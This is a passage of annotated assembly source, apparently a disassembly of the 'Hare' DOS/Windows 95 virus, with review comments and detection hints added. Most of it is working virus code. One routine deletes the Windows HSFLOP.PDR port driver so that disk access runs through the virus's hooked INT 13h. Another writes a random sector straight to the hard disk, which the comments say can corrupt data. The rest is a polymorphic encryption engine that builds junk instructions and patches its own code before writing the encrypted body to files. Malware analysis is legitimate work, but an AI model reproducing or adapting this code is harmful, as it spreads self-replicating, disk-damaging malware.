MOV CX, BX
INC DI
MOV AL,ES:[DI]
CMP AL, '\'
JNE LOC_66
INC DI
MOV SI, DI
MOV DI, OFFSET FileName2
DEC CX
DEC BX
CLD
PUSH CS
POP ES
REP MOVSB
CALL SUB_14
RETN
LOC_66:
MOV BX, 0Ah
PUSH CS
POP ES
RETN
; String constants. FileName2 is the destination of the REP MOVSB in the
; routine above (ES = CS there); Port_Driver is appended to the Windows
; directory by Del_PortDriver, which copies exactly 28 bytes (27 chars + NUL).
FileName1 DB 'DUM1.EXE.EXE', 0 ; 12 chars + NUL.
FileName2 DB 'DUM1.EXECOME', 0 ; 12 chars + NUL; overwritten by the copy above.
Command_Com DB 'COMMAND' ; NOTE(review): no terminator - the bytes run straight
                         ; into Port_Driver; presumably compared by length. Confirm.
Port_Driver DB '\SYSTEM\IOSUBSYS\HSFLOP.PDR', 0 ; 28 bytes incl. NUL (Del_PortDriver's CX).
; Searches the program environment to find a 'WIN'-string. This normally
; matches either WINBOOTDIR or WINDOWS, thus the Windows directory.
; It then appends the path '\SYSTEM\IOSUBSYS\HSFLOP.PDR' to the found
; directory name. The file HSFLOP.PDR handles the port-level access to disks;
; without it Windows needs to use the slow INT 13h (which the virus has
; hooked). Hare does this to also infect boot sectors under Windows 95/NT.
;-----------------------------------------------------------------------
; Del_PortDriver
; Purpose: walk this program's environment block (via PSP:2Ch), find a
;          variable whose name starts with 'WIN', copy its value into
;          Buffer, append Port_Driver and delete that file (DOS fn 41h,
;          issued through Traced_i21h).
; In:    nothing.
; Out:   CF set only on the STC path (delete failed with an error other
;        than 2 = file not found). On the other exits CF is whatever the
;        last instruction left.
; Clobb: AX, BX, CX, DI, SI, flags; ES is left = CS. DS, DX restored.
; Note:  the absence of HSFLOP.PDR is a useful on-disk artefact of this
;        routine for detection / incident response.
;-----------------------------------------------------------------------
Del_PortDriver:
PUSH DS
PUSH DX
XOR DI, DI ; DI = scan offset inside the environment block.
Find_String:
MOV CX, 0FFFFh ; Upper bound for the SCASB scans below.
MOV AH, 62h ; Get PSP.
INT 21h ; -> BX = PSP segment.
MOV ES, BX
MOV ES, ES:[2Ch] ; ES = Program's environment-
CLD ; block (PATH, SET, etc). PSP+2Ch holds the env segment.
Get_Next_String:
MOV AL, 0
REPNE SCASB ; Find end of ASCIIZ-string; DI -> start of the next one.
MOV AX, ES:[DI] ; Get first word.
OR AL, AL ; No settings? (empty string = end of environment)
JZ Exit_Del_Driver ; Then exit routine.
AND AX, 1101111111011111b ; Convert to uppercase.
CMP AX, 'IW' ; WINBOOTDIR/WINDOWS? (AL = 'W', AH = 'I', i.e. "WI" in memory)
JNE Get_Next_String
MOV AL, ES:[DI+2] ; Get third character.
AND AL, 11011111b ; To uppercase.
CMP AL, 'N' ; Have we found WIN ?
JNE Get_Next_String
MOV AL, '=' ; Value.
REPNE SCASB ; Find '='.
JCXZ Exit_Del_Driver ; Not found?
MOV SI, DI ; SI = first byte of the value (just after '=').
MOV BX, DI ; Keep that offset: the retry below resumes the scan from here.
MOV DI, OFFSET Buffer
MOV DX, DI ; DS:DX = Buffer for the delete call.
PUSH ES
POP DS ; DS = environment segment (copy source).
PUSH CS
POP ES ; ES = CS (copy destination).
; This copies the string found above (the variable's value, incl. NUL) to our buffer.
Copy_Byte:
LODSB ; Copy byte to our buffer.
STOSB
OR AL, AL ; End reached?
JNZ Copy_Byte ; No, then continue copy.
DEC DI ; Back onto the NUL so the appended path overwrites it.
PUSH CS
POP DS
MOV SI, OFFSET Port_Driver ; Append path to Windows-dir.
MOV CX, 28 ; Length of Port_Driver including its NUL.
REP MOVSB
MOV AH, 41h ; Delete portdriver.
CALL Traced_i21h ; Presumably DOS fn 41h with DS:DX = Buffer (helper not shown).
JNC Exit_Del_Driver ; Deleted - done.
CMP AL, 02h ; File not found?
; (Wrong string fetched?) - if so, resume the environment scan after the
; previous match; DI is restored from BX without disturbing the CMP flags.
MOV DI, BX
JZ Find_String
STC ; Any other error: report failure.
Exit_Del_Driver:
POP DX
POP DS
RETN
; Junk-instruction table used by SUB_17 (LOC_73): 38 bytes, matching the
; ADD AL,38 bound there. SUB_17 reads at an even offset: the byte at the
; even offset becomes the AH value of a 'MOV AH,imm8' and the byte at the
; following odd offset the vector of an 'INT imm8' (hence the leading
; zero, which shifts the pairs so that the function byte lands on an even
; offset). The pairs are harmless BIOS/DOS calls chosen as filler.
DATA_70 DB 0
DB 1Ah, 02h ; Read real-time clock.
DB 1Ah, 04h ; Read date from real-time clock.
DB 1Ah, 03h ; Set real-time clock.
DB 10h, 08h ; Read character and attribute.
DB 10h, 0Fh ; Get current display mode.
DB 10h, 0Bh ; Set color palette.
DB 21h, 0Dh ; Reset disk.
DB 21h, 18h ; Reserved.
DB 21h, 19h ; Get default drive.
DB '!*!,!0!M!Q!T!b!' ; AND opcodes. ('!' = 21h: INT 21h fns 2Ah,2Ch,30h,4Dh,51h,54h,62h)
DB 0Bh, 21h, 0Dh, 21h
; Int_Table: not executed. A pool of 2-byte opcodes (INT nn = CD nn) that
; SUB_17 (LOC_72) copies out as filler, reading one word at an even offset
; 0..62 from here; the PUSH/POP pairs that follow are part of the same pool.
; Even offsets keep every read on an instruction boundary.
Int_Table:
INT 2Bh
INT 2Ch
INT 2Dh
INT 28h
INT 1Ch ; This is bad programming! (timer-tick user vector)
INT 08h ; This one too! (IRQ0 timer vector)
INT 0Ah
INT 0Bh
INT 0Ch
INT 0Dh
INT 0Fh
INT 0Eh
INT 70h
INT 71h
INT 72h
INT 73h
INT 74h
INT 75h
INT 76h ; Can cause problems, for example with MegaStealth.
INT 77h
INT 01h
INT 03h ; 1 byte breakpoint. (assembles to CCh, so two of them keep
INT 03h ; the table word-aligned.)
; PushPop_Pairs: not executed; continuation of the Int_Table junk pool.
; Each pair is two 1-byte opcodes, so a word read at an even offset yields
; one complete PUSH r / POP r no-op sequence.
PushPop_Pairs:
PUSH AX
POP AX
PUSH BX
POP BX
PUSH CX
POP CX
PUSH DX
POP DX
PUSH DI
POP DI
PUSH SI
POP SI
PUSH BP
POP BP
PUSH DS
POP DS
PUSH ES
POP ES
PUSH SS
POP SS
Random DW 0 ; Get_Random state word: XORed with, then added to, each timer sample.
DATA_74 DB 1Eh ; Last table index handed out by SUB_17 (prevents an immediate repeat).
;-----------------------------------------------------------------------
; SUB_17 - pick one junk instruction for the code generator.
; In:    BL = requested size: 2 (from Int_Table / PushPop_Pairs) or
;        4 (MOV AH,imm8 + INT imm8 built from DATA_70). Any other BL,
;        or bit 4 of the random AH clear, yields nothing.
; Out:   BL = 0 : nothing chosen.
;        BL = 2 : AX = one 2-byte opcode pair from Int_Table.
;        BL = 4 : AX = B4 xx ('MOV AH,xx'), DX = CD yy ('INT yy'),
;                 xx/yy taken from DATA_70.
; Clobb: AX, BX, DX, flags; DATA_74 (last index) updated. SI preserved.
;-----------------------------------------------------------------------
SUB_17:
CALL Get_Random_Poly ; Get random# in AX.
TEST AH, 00010000b ; 1/8 chance. (NOTE(review): a single-bit test passes
                   ; half of the values; the 1/8 figure is not visible here.)
JZ LOC_74
CMP BL, 02h
JE LOC_72
CMP BL, 04h
JE LOC_73
JMP LOC_74
LOC_72:
ADD AL, 64 ; Reduce AL to 0..63 by adding until the first carry.
JNC LOC_72
AND AL, 11111110b ; Even offset -> instruction boundary in the table.
CMP AL, DATA_74 ; Same index as last time? Then draw again.
JE SUB_17
MOV DATA_74, AL
PUSH SI
CBW ; AL < 64, so AH = 0.
XCHG BX, AX ; BX = table index.
MOV SI, OFFSET Int_Table
MOV AX, [BX+SI] ; AX = the two opcode bytes.
POP SI
MOV BL, 02h
RETN
LOC_73:
ADD AL, 38 ; Reduce AL to 0..37 (DATA_70 is 38 bytes long).
JNC LOC_73
AND AL, 11111110b ; Even offset -> (function, vector) pair.
CMP AL, DATA_74
JE SUB_17
MOV DATA_74, AL
PUSH SI
CBW
XCHG BX, AX
MOV SI, OFFSET DATA_70
MOV AH, [BX+SI] ; imm8 of the MOV AH.
MOV DH, [BX+SI+1] ; imm8 of the INT.
MOV AL, 0B4h ; Opcode MOV AH,imm8 -> AX stores as B4 xx.
MOV DL, 0CDh ; Opcode INT imm8   -> DX stores as CD yy.
POP SI
MOV BL, 04h
RETN
LOC_74:
MOV BL, 00h
RETN
;-----------------------------------------------------------------------
; SUB_18 - emit up to two junk instructions at ES:DI.
; In:    BL = size requested from SUB_17 (2 or 4); ES:DI = output
;        position; CL = running count (presumably bytes emitted so far).
; Out:   DI advanced past what was written; CL += bytes written.
; Clobb: AX, BX, DX, BP (used as loop counter), flags.
; Note:  SUB_17 overwrites BL with its result, so the second iteration
;        requests whatever the first one returned (0 -> nothing more).
;-----------------------------------------------------------------------
SUB_18:
MOV BP, 03h ; Two iterations (decremented before the test).
LOC_75:
DEC BP
JZ LOC_RET_78
CALL SUB_17
ADD CL, BL ; BL = 0, 2 or 4 bytes produced.
CMP BL, 2
JB LOC_77 ; Nothing produced.
JA LOC_76 ; 4-byte form.
STOSW ; 2-byte form.
JMP LOC_75
LOC_76:
STOSW ; MOV AH,imm8
MOV AX, DX
STOSW ; INT imm8
LOC_77:
JMP LOC_75
LOC_RET_78:
RETN
;
;
;
; Returns: BX = Random number 0 - 2.
;-----------------------------------------------------------------------
; Get_Ran_3 - draw a value in 0..2 from the poly sector.
; Out:   BX = 0..2 (BH = 0). AL = the unmasked random byte of the
;        accepted draw (AH restored to its entry value).
; Note:  loops until a draw is non-zero and its low two bits are < 3.
;-----------------------------------------------------------------------
Get_Ran_3:
XOR BX, BX
LOC_79:
PUSH AX
CALL Get_Random_Poly
MOV BL, AL
POP AX
MOV AL, BL ; AL keeps the raw byte; AH is the caller's.
OR BL, BL
JZ LOC_79 ; Reject 0 and draw again.
AND BL, 00000011b ; 0 - 3.
CMP BL, 3 ; 0 - 2.
JB LOC_RET_80
JMP LOC_79 ; Reject 3 and draw again.
LOC_RET_80:
RETN
;-----------------------------------------------------------------------
; Check_Poly_Sector
; Purpose: make sure the 512-byte random pool ("poly sector") exists on
;          the first hard disk; (re)generate and write it when the
;          signature word 0CCDDh is missing, or anyway when the low
;          nibble of a fresh Get_Random value is 7.
; Sector:  CHS = (CH_max+1, DH_max-2, 1) from INT 13h fn 08h, DL = 80h.
;          NOTE(review): MOV CL,01h discards the two high cylinder bits
;          that fn 08h returns in CL, so on drives with more than 256
;          cylinders this lands inside the used area rather than past
;          the end - a data-corruption risk worth noting for forensics.
; Out:     nothing meaningful; CF from INT 13h on the read-failure exit.
; Clobb:   AX, BX, CX, DX, DI, flags; DS = ES = CS on return.
; Note:    a failed write is retried forever (LOC_85 -> LOC_83).
;-----------------------------------------------------------------------
Check_Poly_Sector:
PUSH CS
PUSH CS
POP ES
POP DS ; DS = ES = CS.
MOV AH, 08h ; Get disk drive parameters
MOV DL, 80h ; of 1st harddisk.
INT 13h ; -> CH/CL = max cylinder/sector, DH = max head.
MOV BX, OFFSET Poly_Sector ; ES:BX = read buffer.
MOV AX, 0201h ; Read 1 sector.
INC CH ; Last track of harddisk. (low 8 cylinder bits + 1)
DEC DH ;
DEC DH ; Head = max - 2.
MOV CL, 01h ; 1st sector. (also clears the high cylinder bits)
MOV DL, 80h
INT 13h
JC Exit_Poly_Check ; Read failed: give up, CF set.
CALL Get_Random
AND AL, 00001111b ; 0 - 15.
CMP AL, 7
JE Gen_Poly_Sector ; Occasionally regenerate regardless.
CMP [BX], 0CCDDh ; Polysector already present?
JE Exit_Poly_Check
Gen_Poly_Sector:
MOV CX, 256 ; 256 words.
MOV DI, BX
Store_Random:
CALL Get_Random
ADD AX, [DI-2] ; Add previous value. (1st iteration: the word just before Poly_Sector)
MOV [DI], AX
INC DI
INC DI
LOOP Store_Random
MOV [BX], 0CCDDh ; Polysector signature.
LOC_83:
MOV AH, 08h ; Get disk drive parameters.
MOV DL, 80h
INT 13h
MOV BX, OFFSET Poly_Sector ; Write polysector to disk.
MOV AX, 0301h ; Write 1 sector to the same CHS as above.
INC CH
DEC DH
DEC DH
MOV CL, 01h
MOV DL, 80h
INT 13h
JC LOC_85
Exit_Poly_Check:
RETN
LOC_85:
MOV AX, 440Dh
MOV BX, 180h
MOV CX, 84Bh
INT 21h ; DOS Services ah=function 44h
; IOctl-D block device control
; bl=drive, cx=category/type
; ds:dx ptr to parameter block
; (presumably the DOS 7 / Win95 volume-lock request so that the direct
; write is allowed; then retry the write. Confirm against a DOS reference.)
JMP LOC_83
;
; Gets a random number from the polymorphic sector.
; Returns: AX = Random number.
;
;-----------------------------------------------------------------------
; Get_Random_Poly
; Returns AX = next word from the poly sector. The first word of
; Poly_Sector is reused as the read cursor (byte offset); Poly_Engine
; zeroes it first, otherwise the 0CCDDh signature (>= 512) triggers the
; wrap below on the first call.
; Out:   AX; BX preserved; flags clobbered; cursor advanced by 2.
; Note:  on wrap the cursor restarts at 2 or 3 depending on its parity,
;        so the stream alternates between even and odd word alignment.
;        A cursor of 510 advances to 512 and reads one word past the
;        512-byte sector before wrapping on the next call.
;-----------------------------------------------------------------------
Get_Random_Poly:
PUSH BX
MOV BX, CS:Poly_Sector ; BX = cursor.
CMP BX, 512
JB LOC_86
AND BX, 00000001b ; 0 - 1.
XOR BL, 00000001b ; Flip.
LOC_86:
ADD BX, 2 ; Next word.
MOV CS:Poly_Sector, BX
MOV AX, CS:[Poly_Sector+BX]
POP BX
RETN
;
; Return: AX = Random value (1 - 65535).
;
;-----------------------------------------------------------------------
; Get_Random
; Returns AX = a value derived from the 8253 timer channel 0 count,
; mixed into the Random state word. Both AH and AL are forced non-zero
; by the retry loop (so not every value in 1..65535 is reachable).
; Clobb: AX, flags; CX preserved. Updates CS:Random.
; Note:  the delay loop runs (AX & 7FFh) iterations, except that a value
;        of 0 makes LOOP run 65536 times.
;-----------------------------------------------------------------------
Get_Random:
XOR AL, AL
OUT 43h, AL ; port 43H, 8253 timer control
; al = 0, latch timer0 count
JMP $+2 ; Delay for I/O.
IN AL, 40h ; Low byte of the latched count.
MOV AH, AL
IN AL, 40h ; High byte.
XOR AL, AH
XCHG AL, AH
PUSH CX
MOV CL, AH
AND CL, 00001111b ; Rotate by 0..15 bits.
ROL AX, CL
MOV CX, AX
AND CX, 0000011111111111b ; Busy-wait count, 0..2047 (see note above).
Delay_Loop:
JMP $+2
NOP
LOOP Delay_Loop
POP CX
XOR CS:Random, AX ; Fold the sample into the state ...
ADD AX, CS:Random ; ... and return sample + new state.
OR AH, AH
JZ Get_Random ; Reject a zero high byte.
OR AL, AL
JZ Get_Random ; Reject a zero low byte.
RETN
;-----------------------------------------------------------------------
; Poly_Engine
; Purpose: build the encrypted copy of the body at CS:Undoc and write
;          it to the file whose handle is in BX (DOS fn 40h via
;          Traced_i21h). Self-modifying: the two DB 28H,0E0H stubs
;          (Shit3, Poke1 - 'SUB AL,AH') are overwritten at run time with
;          the opcode selected from Encr_Methods before the loops run.
; In:    BX = file handle; DS:0 = source bytes (SI starts at 0).
; Out:   CF clear on success; CF set if SUB_38 failed (LOC_94 path).
; Clobb: AX, CX, DX, DI, flags and the DATA_* / Key_* / Poke fields
;        written below. BX, SI preserved.
; Note:  SUB_38, SUB_39, SUB_31 and SUB_24 are not shown here; SUB_38
;        presumably refills the source buffer from the file handle -
;        confirm. Detection hint: the CS writes at Poke1/Shit3 are the
;        kind of in-place code patching that an emulator can flag.
;-----------------------------------------------------------------------
Poly_Engine:
PUSH SI
PUSH BX ; Filehandle.
CLD
MOV Poly_Sector, 0 ; Reset the Get_Random_Poly cursor.
XOR SI, SI ; Source offset.
MOV DI, OFFSET Undoc ; Destination buffer.
MOV DATA_77, 1C6Ah ; Bytes still to process after the first 200h.
MOV AX, Host_Entrypoint
MOV DATA_84, AX
CALL Get_Ran_3 ; BX = 0..2: which entry of Encr_Methods.
MOV AL, [BX+Encr_Methods]
MOV AH, 0E0h ; Second byte of the 'op AL,AH' encoding.
MOV word ptr Poke1, AX ; Patch the two stub instructions below.
MOV word ptr Shit3, AX
XOR BL, 03h ; Presumably the matching inverse method (index 3-BX); confirm.
MOV AL, Encr_Methods[BX]
MOV Shit2, AL
CALL Get_Random_Poly ; AL -> running key, AH -> operand of the patched op.
MOV DATA_94, AL
MOV Key_3, AL
MOV DATA_82, AH
POP BX ; BX = file handle again (value stays on the stack).
PUSH BX
MOV word ptr Decrypt_2, 0F72Eh
MOV BYTE PTR Key_2, 15h
MOV CX, 14h ; First 14h bytes: only the patched op with AH.
LOCLOOP_89:
LODSB ; String [si] to al
Shit3:
;* SUB AL,AH
DB 28H,0E0H ; Fixup - byte match (patched at run time, see above)
STOSB ; Store al to es:[di]
LOOP LOCLOOP_89 ; Loop if cx > 0
MOV CX, 1ECh ; Remaining 1ECh bytes of the first 200h.
LOCLOOP_90:
LODSB ; String [si] to al
CMP SI,1A3H ; From source offset 1A3h on, also apply the running key.
JB LOC_91
XCHG DATA_94, AH ; AH = running key, AH's value parked in DATA_94.
XOR AL, AH
ADD AH, 01h ; Key advances by one per byte.
XCHG DATA_94, AH ; Store key back, restore AH.
LOC_91:
NOT AL
Poke1:
;* SUB AL,AH
DB 28H,0E0H ; Fixup - byte match (patched at run time, see above)
STOSB
LOOP LOCLOOP_90
CALL SUB_38 ; Not shown; CF set = failure.
JC LOC_94
MOV CX,DATA_77 ; Bytes left.
JCXZ LOC_93 ; Jump if cx=0
SUB CX, 200h
JC LOC_92 ; Less than 200h left: final partial block.
MOV DATA_77, CX
MOV CX, 200h ; Process another full 200h block.
JMP LOCLOOP_90
LOC_92:
ADD CX, 512 ; CX = remaining byte count (< 200h).
MOV DATA_77, 0
MOV DX, CX
JMP LOCLOOP_90
LOC_93:
CALL SUB_39
CALL SUB_31
CALL SUB_24 ; Presumably generates the decryptor; not shown.
MOV DX, 1F6Ah ; DS:DX = data to write.
MOV AH, 40h ; DOS write to handle BX.
ADD CX, 11h ; CX = byte count (+11h).
NOP
CALL Traced_i21h
CLC ; Success.
LOC_94:
POP BX
POP SI
RETN
SUB_24:
PUSH BX
PUSH BP
MOV SI, OFFSET Undoc
MOV DI, OFFSET Drew1
XOR CX, CX
CALL Make_Clear_Flags
MOV BL, 04h
CALL SUB_18
CALL SUB_34
CALL SUB_36
CALL Make_Uncon_JMP
CALL SUB_25
CALL Make_Uncon_JMP
CALL SUB_25
CALL Make_Uncon_JMP
CALL SUB_25
CALL Make_Uncon_JMP
MOV BL, 02h
CALL SUB_18
CALL Make_Uncon_JMP
CALL Get_Random_Poly
CMP AH, 128
JB LOC_95
MOVSB
JMP LOC_96
LOC_95:
OR Flags, 00010000b
SUB CL, 01h
INC SI
LOC_96:
CALL Make_Uncon_JMP
CALL SUB_28
MOV CH,CL
MOV BL, 2
CALL SUB_18
CALL Make_Uncon_JMP
MOVSW
MOVSB
CALL Make_Uncon_JMP
CALL SUB_33
MOV BL,2
CALL SUB_18
CALL SUB_27
MOV BL,2
CALL SUB_18
CALL Make_Uncon_JMP
CALL SUB_26
MOV BL,2
CALL SUB_18
CALL Make_Uncon_JMP
MOV AL,CL
SUB AL,CH
MOV CH,AL
LODSW ; String [si] to ax
SUB AH, CH
STOSW
MOV BL, 02h
CALL SUB_18
CALL Make_Uncon_JMP
CALL SUB_30
CALL Get_Random_Poly
AND AL, 00000111b
ADD CL, AL
MOV CH, 00h
CMP Host_Type, CH
JE LOC_97
ADD File_Mod512, CX
CMP File_Mod512, 512
JB LOC_97
INC Byte_Pages ; Rounding.
SUB File_Mod512, 512
JNZ LOC_97